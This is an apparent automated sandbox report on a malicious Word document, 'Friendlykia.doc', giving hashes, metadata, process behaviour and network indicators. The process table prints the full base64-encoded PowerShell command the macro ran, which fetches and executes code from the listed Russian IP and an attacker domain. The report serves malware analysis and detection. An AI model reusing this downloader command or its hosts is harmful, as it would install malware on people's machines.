analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Friendlykia.doc

Full analysis: https://app.any.run/tasks/ad5c302b-93b0-4e10-80e6-fb081c23ba59
Verdict: Malicious activity
Analysis date: December 18, 2018, 17:44:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-close
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Virtual neutral moderator, Subject: North Dakota Louie, Author: 017-136-2866 x6503, Comments: Realigned tertiary extranet, Template: Normal, Last Saved By: Windows, Revision Number: 12, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Tue Dec 18 10:15:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0
MD5:

6FA94A25F808E4248FCAD4A73F945118

SHA1:

B979F918002C09069E087A4CA885E6E70041B778

SHA256:

48937EDEC31E15B4EB8F096AAB4A0001A603D73F86C282B8C112FF0B8F84B07C

SSDEEP:

1536:7A2QDAYiQd14Pdfkjy5WJxFgQD43xbyr7BKL6:qtRd14PBkjzeWrQL6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2980)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2980)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3544)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2980)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2980)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Virtual neutral moderator
Subject: North Dakota Louie
Author: 017-136-2866 x6503
Keywords: -
Comments: Realigned tertiary extranet
Template: Normal
LastModifiedBy: Пользователь Windows
RevisionNumber: 12
Software: Microsoft Office Word
TotalEditTime: 3.0 minutes
CreateDate: 2018:04:19 18:59:00
ModifyDate: 2018:12:18 10:15:00
Pages: 1
Words: -
Characters: 2
Security: None
CodePage: Windows Cyrillic
Manager: Gregory Reilly
Company: Yundt-Medhurst Keven Turcotte
Bytes: 23552
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 2
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe explorer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2980"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Friendlykia.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3544powershell.exe -NoP -Exec Bypass -EC JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgANAAoAIAAgAGkAZgAoACQAbQAuAE4AYQBtAGUAIAAtAGUAcQAgACIARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoADQAKACAAIAAgACAAIAAgACAAJAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADMALgAxADQANQAvAHIAZQB6AC0AcwBlAG4AcQBvAC8AbwA0ADAAMgBlAGsAMgBtAC4AcABoAHAAIgA7AA0ACgAgACAAIAAgACAAIAAgAEkARQBYACgAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQApADsADQAKAAkADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAB9AA0ACgANAAoAIAAgAGkAZgAoACQAbQAuAE4AYQBtAGUAIAAtAGUAcQAgACIARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAIgApAHsADQAKACAAIAAgACAAIAB0AHIAeQB7AA0ACgAgACAAIAAgACAAJAB1AHIAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAoACIAaAB0AHQAcAA6AC8ALwBpAHMAYwBvAG4AZABpAHMAdABoAC4AYwBvAG0ALwByAGUAegAtAHMAZQBuAHEAbwAvAG8ANAAwADIAZQBrADIAbQAuAHAAaABwAD8AbAA9AHMAaQB4AGkAbgBvADYALgBkAGQAcwAiACkADQAKACAAIAAgACAAIAAkAHIAZQBzAHAAbwBuAHMAZQAgAD0AIAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApADsADQAKAA0ACgAgACAAIAAgACAAJABwAGEAdABoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoARwBlAHQARgBvAGwAZABlAHIAUABhAHQAaAAoACIAQwBvAG0AbQBvAG4AQQBwAHAAbABpAGMAYQB0AGkAbwBuAEQAYQB0AGEAIgApACAAKwAgACIAXABcAG4AdwBTAEMAdwAuAGUAeABlACIAOwANAAoAIAAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgALAAgACQAcgBlAHMAcABvAG4AcwBlACkAOwANAAoADQAKACAAIAAgACAAIAAkAGMAbABzAGkAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARwB1AGkAZAAgACcAQwAwADgAQQBGAEQAOQAwAC0ARgAyAEEAMQAtADEAMQBEADEALQA4ADQANQA1AC0AMAAwAEEAMABDADkAMQBGADMAOAA4ADAAJwANAAoAIAAgACAAIAAgACQAdAB5AHAAZQAgAD0AIABbAFQAeQBwAGUAXQA6ADoARwBlAHQAVAB5AHAAZQBGAHIAbwBtAEMATABTAEkARAAoACQAYwBsAHMAaQBkACkADQAKACAAIAAgACAAIAAkAG8AYgBqAGUAYwB0ACAAPQAgAFsAQQBjAHQAaQB2AGEAdABvAHIAXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJAB0AHkAcABlACkADQAKACAAIAAgACAAIAAkAG8AYgBqAGUAYwB0AC4ARABvAGMAdQBtAGUAbgB0AC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAkAHAAYQB0AGgALAAkAG4AdQBsACwAIAAkAG4AdQBsACwAIAAkAG4AdQBsACwAMAApAA0ACgANAAoAIAAgACAAIAAgAH0AYwBhAHQAYwBoAHsAfQANAAoAIAAgACAAIAAgAA0ACgAgACAAfQANAAoAfQANAAoADQAKAEUAeABpAHQAOwANAAoADQAKAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2620"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 641
Read events
1 214
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2980WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA83A.tmp.cvr
MD5:
SHA256:
3544powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0HLEJBR691V2U752U75P.temp
MD5:
SHA256:
2980WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~WRD0000.tmp
MD5:
SHA256:
2980WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF00CDA5A0BB881221.TMP
MD5:
SHA256:
2980WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF446C065420F069C6.TMP
MD5:
SHA256:
2980WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF72291A50D56134A7.TMP
MD5:
SHA256:
2980WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{85AE0C2C-C8E3-42B3-9B8C-3B2D22AD5D6B}.tmp
MD5:
SHA256:
2980WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E8C9B561-766A-49E9-9ADE-766CDB3CA5AC}.tmp
MD5:
SHA256:
2980WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$iendlykia.docpgc
MD5:E88A35AF4C2336E2F3AAEB90B5330840
SHA256:7FCD5A395F11A2A1D61F0931780AB479AD216EB32FC998C2512AB0D1A68785FB
2980WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Friendlykia.docdocument
MD5:19E2A0C4B4D3C1D2FB51F6B7911427E0
SHA256:647457B5458036672C256DE36DAEE37525A512027E62E8C53C0B7997B9E88258
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3544
powershell.exe
GET
176.32.33.145:80
http://176.32.33.145/rez-senqo/o402ek2m.php
RU
unknown
3544
powershell.exe
GET
176.32.33.145:80
http://176.32.33.145/rez-senqo/o402ek2m.php
RU
unknown
3544
powershell.exe
GET
404
205.185.120.136:80
http://iscondisth.com/rez-senqo/o402ek2m.php?l=sixino6.dds
US
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3544
powershell.exe
176.32.33.145:80
LLC Baxet
RU
unknown
3544
powershell.exe
205.185.120.136:80
iscondisth.com
FranTech Solutions
US
suspicious

DNS requests

Domain
IP
Reputation
iscondisth.com
  • 205.185.120.136
suspicious

Threats

No threats detected
No debug info